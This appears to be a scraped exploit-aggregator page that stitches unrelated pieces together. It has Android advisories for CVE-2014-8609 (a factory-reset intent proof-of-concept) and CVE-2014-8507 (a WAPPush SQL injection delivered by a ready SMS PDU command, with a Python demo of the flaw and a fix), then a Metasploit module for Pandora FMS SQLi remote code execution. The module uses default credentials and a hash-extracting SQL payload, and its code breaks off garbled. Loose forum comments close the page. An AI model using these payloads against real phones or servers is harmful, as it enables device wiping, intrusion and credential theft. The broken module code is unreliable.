            throws NetworkErrorException {
        PendingIntent test = (PendingIntent) options.getParcelable("pendingIntent");
        Intent newIntent2 = new Intent("android.intent.action.MASTER_CLEAR");
        try {
            test.send(mContext, 0, newIntent2, null, null);
        } catch (CanceledException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

This has been fixed in Android 5.0 (Android bug id 17356824):
https://android.googlesource.com/platform/packages/apps/Settings/+/f5d3e74ecc2b973941d8adbe40c6b23094b5abb7

TIMELINE
==================================
02.09.2014 Initial report to Android Security Team with the phishing SMS POC
03.09.2014 Reply from Android Security Team "opened an internal inquiry about this"
09.09.2014 Find a new factory reset POC and notify Android Security Team
10.09.2014 Reply from Android Security Team "We do acknowledge the issue"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in the change log, ask Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8609 assigned
25.11.2014 Got permission from Android Security Team to publish this
26.11.2014 Public disclosure

IDENTIFIERS
==================================
CVE-2014-8609
Android id 17356824

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

Source
  21. INTRODUCTION
==================================
In Android <5.0, a SQL injection vulnerability exists in the optional module WAPPushManager; an attacker can remotely send a malformed WAPPush message to launch any activity or service on the victim's phone (need permission check).

DETAILS
==================================
When a WAPPush message is received, the raw pdu is processed by the dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java

Here the pdu is parsed to get the contentType & wapAppId:

    String mimeType = pduDecoder.getValueString();
    ...
    /**
     * Seek for application ID field in WSP header.
     * If application ID is found, WapPushManager substitute the message
     * processing. Since WapPushManager is optional module, if WapPushManager
     * is not found, legacy message processing will be continued.
     */
    if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
        index = (int) pduDecoder.getValue32();
        pduDecoder.decodeXWapApplicationId(index);
        String wapAppId = pduDecoder.getValueString();
        if (wapAppId == null) {
            wapAppId = Integer.toString((int) pduDecoder.getValue32());
        }
        String contentType = ((mimeType == null) ?
                Long.toString(binaryContentType) : mimeType);
        if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);

The wapAppId & contentType can be literal strings embedded in the pdu. To prove this, we can launch an Android 4.4 emulator and send an sms pdu through the telnet console. Type the following command in the telnet console:

    sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001

And watch the radio logcat messages in the emulator; it prints out the extracted malicious appid:

    ' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

However, since WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!" But if WAPPushManager is installed, the extracted wapAppId & contentType will be sent to its method processMessage:

    try {
        boolean processFurther = true;
        IWapPushManager wapPushMan = mWapPushManager;
        if (wapPushMan == null) {
            if (DBG) Rlog.w(TAG, "wap push manager not found!");
        } else {
            Intent intent = new Intent();
            intent.putExtra("transactionId", transactionId);
            intent.putExtra("pduType", pduType);
            intent.putExtra("header", header);
            intent.putExtra("data", intentData);
            intent.putExtra("contentTypeParameters", pduDecoder.getContentParameters());
            int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);

So we go on checking the source code of WAPPushManager:
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/

In the method processMessage, app_id and content_type are used in the method queryLastApp:

    public int processMessage(String app_id, String content_type, Intent intent)
            throws RemoteException {
        Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
        WapPushManDBHelper dbh = getDatabase(mContext);
        SQLiteDatabase db = dbh.getReadableDatabase();
        WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
        db.close();

Then in the method queryLastApp, both app_id and content_type are concatenated without any escaping to build the rawQuery sql input:

    protected queryData queryLastApp(SQLiteDatabase db,
            String app_id, String content_type) {
        String sql = "select install_order, package_name, class_name, "
                + " app_type, need_signature, further_processing"
                + " from " + APPID_TABLE_NAME
                + " where x_wap_application=\'" + app_id + "\'"
                + " and content_type=\'" + content_type + "\'"
                + " order by install_order desc";
        if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
        Cursor cur = db.rawQuery(sql, null);

Obviously, this is a SQL injection. For example, if app_id is as follows:

    ' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

Then the package_name & class_name of the query result would be "com.android.settings" and "com.android.settings.Settings".

OK, then we return to the method processMessage of WAPPushManager. The appType, packageName and className are fully controllable, and they are used to set the component of an intent that starts an activity or service. That means an attacker can remotely launch any activity or service by constructing a malformed WAPPush message (need permission check):

    if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
        //Intent intent = new Intent(Intent.ACTION_MAIN);
        intent.setClassName(lastapp.packageName, lastapp.className);
        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        try {
            mContext.startActivity(intent);
        } catch (ActivityNotFoundException e) {
            Log.w(LOG_TAG, "invalid name " + lastapp.packageName + "/" + lastapp.className);
            return WapPushManagerParams.INVALID_RECEIVER_NAME;
        }
    } else {
        intent.setClassName(mContext, lastapp.className);
        intent.setComponent(new ComponentName(lastapp.packageName, lastapp.className));
        if (mContext.startService(intent) == null) {
            Log.w(LOG_TAG, "invalid name " + lastapp.packageName + "/" + lastapp.className);
            return WapPushManagerParams.INVALID_RECEIVER_NAME;
        }
    }

This has been fixed in Android 5.0 (Android bug id 17969135):
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6

TIMELINE
==================================
11.10.2014 Initial report to Android Security Team with the POC
14.10.2014 Reply from Android Security Team "are looking into it"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in the change log, request status update
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
09.11.2014 Contact MITRE about this issue
17.11.2014 CVE-2014-8507 assigned
26.11.2014 Public disclosure

IDENTIFIERS
==================================
CVE-2014-8507
Android id 17969135

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

Source
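The queryLastApp() string building reproduced against SQLite, as an added example that is not part of the advisory or of AOSP. The table name and the one registered receiver are constructed, and only the columns queryLastApp() reads are modelled. query_last_app_vulnerable() concatenates app_id and content_type exactly as the 4.4 code does, so the advisory's app_id payload turns the lookup into a UNION whose row carries attacker-chosen package_name and class_name (the rest of the WHERE clause and the ORDER BY are commented out by the trailing "--"). query_last_app_fixed() is the usual remedy, bound parameters, shown here as an assumption rather than as the exact change in the linked AOSP commit: the same app_id then simply matches nothing.

```python
import sqlite3

# Constructed stand-in for WapPushManDBHelper's table (assumed name and layout).
APPID_TABLE_NAME = "appid_tbl"

# The X-Wap-Application-Id value from the advisory's PDU.
MALICIOUS_APP_ID = ("' union select 0,'com.android.settings',"
                    "'com.android.settings.Settings',0,0,0--")

SELECT_PREFIX = ("select install_order, package_name, class_name,"
                 " app_type, need_signature, further_processing"
                 " from " + APPID_TABLE_NAME)


def setup_db():
    """In-memory database with one legitimately registered receiver (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "create table %s (install_order integer, package_name text, class_name text,"
        " app_type integer, need_signature integer, further_processing integer,"
        " x_wap_application text, content_type text)" % APPID_TABLE_NAME)
    db.execute(
        "insert into %s values (1,'com.example.push','com.example.push.Receiver',"
        "1,1,0,'x-wap-application:push.sia','application/vnd.wap.sic')" % APPID_TABLE_NAME)
    return db


def query_last_app_vulnerable(db, app_id, content_type):
    """Same SQL text construction as WAPPushManager's queryLastApp in Android 4.4:
    a single quote in app_id closes the literal and the remainder is parsed as SQL."""
    sql = (SELECT_PREFIX +
           " where x_wap_application='" + app_id + "'" +
           " and content_type='" + content_type + "'" +
           " order by install_order desc")
    return db.execute(sql).fetchone()


def query_last_app_fixed(db, app_id, content_type):
    """Bound parameters: the header values never become part of the SQL text."""
    sql = (SELECT_PREFIX +
           " where x_wap_application=? and content_type=?"
           " order by install_order desc")
    return db.execute(sql, (app_id, content_type)).fetchone()


def component_for(row):
    """The (package_name, class_name) processMessage would start, or None."""
    return None if row is None else (row[1], row[2])


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", component_for(query_last_app_vulnerable(db, MALICIOUS_APP_ID, "text/plain")))
    print("fixed:     ", component_for(query_last_app_fixed(db, MALICIOUS_APP_ID, "text/plain")))
```

With the vulnerable query the attacker never needs a matching registration: the first SELECT returns nothing and the UNION supplies the row, app_type 0 included, which is what later selects the startService() branch in processMessage.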
  22.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Pandora FMS SQLi Remote Code Execution',
      'Description'    => %q{
        This module attempts to exploit multiple issues in order to gain remote
        code execution under Pandora FMS version <= 5.0 SP2. First, an attempt
        to authenticate using default credentials is performed. If this method
        fails, a SQL injection vulnerability is leveraged in order to extract
        the "Auto Login" password hash. If this value is not set, the module
        will then extract the administrator account's MD5 password hash.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Lincoln <Lincoln[at]corelan.be>',     # Discovery, Original Proof of Concept
          'Jason Kratzer <pyoor[at]corelan.be>'  # Metasploit Module
        ],
      'References'     =>
        [
          ['URL', 'http://pandorafms.com/downloads/whats_new_5-SP3.pdf'],
          ['URL', 'http://blog.pandorafms.org/?p=2041']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Pandora FMS version <= 5.0 SP2', {}]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 50000,
          'DisableNops' => true,
        },
      'DisclosureDate' => "Feb 1 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
        OptString.new('USER', [false, 'The username to authenticate with', 'admin']),
        OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']),
      ], self.class)
  end

  def uri
    target_uri.path
  end

  def check
    vprint_status("#{peer} - Trying to detect installed version")

    version = nil
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'index.php')
    })

    if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/
      if res.body =~ /<div id="ver_num">v(.*?)<\/div>/
        version = $1
      else
        return Exploit::CheckCode::Detected
      end
    end

    unless version.nil?
      vprint_status("#{peer} - Pandora FMS #{version} found")
      if Gem::Version.new(version) <= Gem::Version.new('5.0SP2')
        return Exploit::CheckCode::Appears
      end
    end

    Exploit::CheckCode::Safe
  end

  # Attempt to login with credentials (default admin:pandora)
  def authenticate
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'index.php'),
      'vars_get'  => {
        'login' => "1",
      },
      'vars_post' => {
        'nick'  => datastore['USER'],
        'pass'  => datastore['PASS'],
        'Login' => 'Login',
      }
    })

    return auth_succeeded?(res)
  end

  # Attempt to login with auto login and SQLi
  def login_hash
    clue = rand_text_alpha(8)
    sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join

    # select value from tconfig where token = 'loginhash_pwd';
    sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
    sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
    sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
    sqli << "BY x)a) AND 'msf'='msf"

    password = inject_sql(sqli, clue)

    if password && password.length != 0
      print_status("#{peer} - Extracted auto login password (#{password})")
    else
      print_error("#{peer} - No auto login password has been defined!")
      return false
    end

    print_status("#{peer} - Attempting to authenticate using (admin:#{password})")

    # Attempt to login using login hash password
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'index.php'),
      'vars_get'  => {
        'loginhash' => 'auto',
      },
      'vars_post' => {
        'loginhash_data' => Rex::Text.md5("admin#{password}"),
        'loginhash_user' => 'admin',
      }
    })

    return auth_succeeded?(res)
  end

  def auth_succeeded?(res)
    if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
      print_status("#{peer} - Successfully authenticated!")
      print_status("#{peer} - Attempting to retrieve session cookie")
      @cookie
    }, 1)
  end
end

Source
  23. Eh, with leniency, 5 years. Anyway, censorship is already present on the internet right now, it's just not that "harsh" yet. Still, another piece of bad news.
  24. Why are you insulting the guy? What he's doing deserves appreciation, let's not go down that road... better keep your spiteful comments to yourself.
  25. I've just booted into Windows and Kaspersky doesn't detect it on my machine either... @adrenalintm did you buy the license or is it ...